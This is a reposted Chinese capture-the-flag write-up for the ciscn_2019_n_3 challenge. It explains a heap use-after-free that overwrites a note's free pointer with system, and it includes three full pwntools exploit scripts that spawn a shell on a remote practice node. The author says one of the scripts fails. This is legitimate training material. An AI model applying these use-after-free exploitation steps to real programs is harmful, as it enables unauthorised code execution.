//该结构体仅仅是选择字符串的时候的结构体
struct chunk
{
void *rec_str_print();
void *rec_str_free();
char *str;
}
//该结构体仅仅是选择数字的时候的结构体
struct chunk
{
void *rec_int_print();
void *rec_int_free();
int number;
}
这道题目就是简单的uaf漏洞利用,由于system已经给你了,所以连泄露地址都给你省了。很时候新手练习uaf。简单来说,就是通过堆漏洞将rec_int_free或者rec_str_free给需要为system。或者将rec_str_free给修改为system
一个不知道为什么不可以的payload, 感觉良好觉得非常可以,但是就是不行。希望有大神可以解惑一下啊
from pwn import *
context(log_level='debug',arch='i386')
#p = process('./ciscn_2019_n_3')
p = remote('node4.buuoj.cn',28062)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("./libc-2.27.so")
def new(index,length,content):
p.recvuntil("CNote > ")
p.sendline('1')
p.recvuntil("Index > ")
p.sendline(str(index))
p.recvuntil("Type > ")
p.sendline('2')
p.recvuntil("Length > ")
p.sendline(str(length))
p.recvuntil("Value > ")
p.sendline(content)
def delete(index):
p.recvuntil("CNote > ")
p.sendline('2')
p.recvuntil("Index > ")
p.sendline(str(index))
def show(index):
p.recvuntil("> ")
p.sendline('3')
p.recvuntil("> ")
p.sendline(str(index))
new(0,0x40,'aaaa')
new(1,0x30,'bbbb')
delete(0)
delete(1)
payload = flat([b'aaaa',elf.plt['system']]) #看了一下网上其他人的教程将aaaa改为bash就可以了。虽然我也不知道为什么。
new(2,0xc,payload)
new(3,0x40,b'/bin/sh\x00')
delete(0)
p.interactive()
通过Integer进行利用
from pwn import *
context(log_level='debug',arch='i386')
#p = process('./ciscn_2019_n_3')
p = remote('node4.buuoj.cn',28062)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("./libc-2.27.so")
def new(index,number):
p.recvuntil("CNote > ")
p.sendline('1')
p.recvuntil("Index > ")
p.sendline(str(index))
p.recvuntil("Type > ")
p.sendline('1')
p.recvuntil("Value > ")
p.sendline(str(number))
def delete(index):
p.recvuntil("CNote > ")
p.sendline('2')
p.recvuntil("Index > ")
p.sendline(str(index))
def show(index):
p.recvuntil("> ")
p.sendline('3')
p.recvuntil("> ")
p.sendline(str(index))
new(0,2)
new(1,2)
new(2,2)
delete(0)
delete(1)
payload = flat([b'sh\x00\x00',elf.plt['system']])
p.recvuntil("CNote > ")
p.sendline('1')
p.recvuntil("Index > ")
p.sendline('3')
p.recvuntil("Type > ")
p.sendline('2')
p.recvuntil("Length > ")
p.sendline(str(0xc))
p.recvuntil("Value > ")
p.sendline(payload)
delete(0)
p.interactive()
这个是可以利用成功的, 搞不明白为什么将’bin/sh’写入 0 的 string里面就不可以,通过text进行利用。和上面第一个不可以的exp明明是一个思路。搞不明白。
from pwn import *
context(log_level='debug',arch='i386')
#p = process('./ciscn_2019_n_3')
p = remote('node4.buuoj.cn',28062)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("./libc-2.27.so")
def new(index,length,content):
p.recvuntil("CNote > ")
p.sendline('1')
p.recvuntil("Index > ")
p.sendline(str(index))
p.recvuntil("Type > ")
p.sendline('2')
p.recvuntil("Length > ")
p.sendline(str(length))
p.recvuntil("Value > ")
p.sendline(content)
def delete(index):
p.recvuntil("CNote > ")
p.sendline('2')
p.recvuntil("Index > ")
p.sendline(str(index))
def show(index):
p.recvuntil("> ")
p.sendline('3')
p.recvuntil("> ")
p.sendline(str(index))
new(0,0x30,'aaaa')
new(1,0x30,'bbbb')
delete(0)
delete(1)
payload = flat([b'sh\x00\x00',elf.plt['system']])
new(3,0xc,payload)
delete(0)
p.interactive()
版权说明 : 本文为转载文章, 版权归原作者所有 版权申明
原文链接 : https://blog.csdn.net/Y_peak/article/details/121438504
内容来源于网络,如有侵权,请联系作者删除!